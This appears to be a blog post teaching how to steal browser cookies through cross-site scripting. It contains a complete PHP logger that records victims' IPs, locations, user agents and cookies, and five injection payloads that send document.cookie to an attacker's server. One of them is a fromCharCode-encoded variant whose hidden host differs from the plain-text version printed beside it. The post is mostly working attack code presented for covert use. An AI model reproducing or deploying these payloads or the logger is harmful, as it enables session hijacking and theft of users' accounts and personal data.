What/why?
Stealing cookies isn't complicated, but sometimes it can be tricky depending on what is filtered from your JS injection. It can be made much harder if your aim is to steal them silently without the person knowing.
The script
PHP Code:
<?
//Check if cookie file exists, if not create it
if (!file_exists("cookie.txt")) {file_put_contents("cookie.txt", "<h1>r0ng's cookie logger</h1>");
}
//Set cookie file variable
$file = 'cookie.txt';
//Check for password, display cookie file to admin
if (isset($_GET['pass']) && $_GET['pass'] == "r0ng") {
while (!is_readable($file)) {
//Wait for file permissions
}
die("<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>" . file_get_contents($file) . "</table>");
}
//Derive victim's real ip
$ipAddress = $_SERVER['REMOTE_ADDR'];
if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {
$ipAddress = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
}
//cURL function for geo API calls
function get_content($URL){
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $URL);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
//Setting data variable with victim's info in table form
$countryCode = get_content('http://api.wipmania.com/' . $ipAddress);$data = "<tr><td><img src=http://www.geonames.org/flags/x/" . strtolower($countryCode) . ".gif width='100'></td><td>" . $countryCode . "</td><td>" . htmlspecialchars($ipAddress) . "</td><td>" . htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . "</td><td>" . (isset($_GET['cookie']) ? htmlspecialchars($_GET['cookie']) :"") . "</td><td>" . (isset($_SERVER['HTTP_REFERER']) ? htmlspecialchars($_SERVER['HTTP_REFERER']) :"") . "</td><tr>";
while (!is_writable($file)) {
//Wait for file permissions
}
//Append data to file in new line
file_put_contents($file, $data, FILE_APPEND);?>
Tutorial
a.) Setting it up:
Upload that script to your webhost (logger.php).
You access the admin panel with /logger.php?pass=r0ng
b.) JS injections:
For most of the injections, we are taking advantage of the inherent stealthiness of XMLHttpRequests. Same-domain restrictions only apply if we need a response from our evil-site (which we don't).
1.) Quotes allowed:
<script>var a = new XMLHttpRequest(); a.open("get", "http://yourevilsite.com/logger.php?cookie=" + document.cookie); a.send();</script>
2.) Apostrophe allowed:
<script>var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();</script>
3.) Quotes/apostraphe not allowed:
<script>eval(String.fromCharCode(118, 97, 114, 32, 97, 32, 61, 32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 32, 97, 46, 111, 112, 101, 110, 40, 39, 103, 101, 116, 39, 44, 32, 39, 104, 116, 116, 112, 58, 47, 47, 100, 102, 117, 49, 50, 51, 46, 99, 111, 109, 117, 108, 101, 46, 99, 111, 109, 47, 108, 111, 103, 103, 101, 114, 46, 112, 104, 112, 63, 99, 111, 111, 107, 105, 101, 61, 39, 32, 43, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59, 32, 97, 46, 115, 101, 110, 100, 40, 41, 59));</script>
var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();
4.) Quotes/apostrophe not allowed but can reference external script:
<SCRIPT SRC=http://yourevilsite.com/evil.js></SCRIPT>
Note 2: Any of the other injections would be placed inside of the evil.js file (without javascript tags).
5.) Not enough space:
<script>window.location.replace("//yourevilsite.com/logger.php?cookie=" + document.cookie)</script>
just so2
ReplyDelete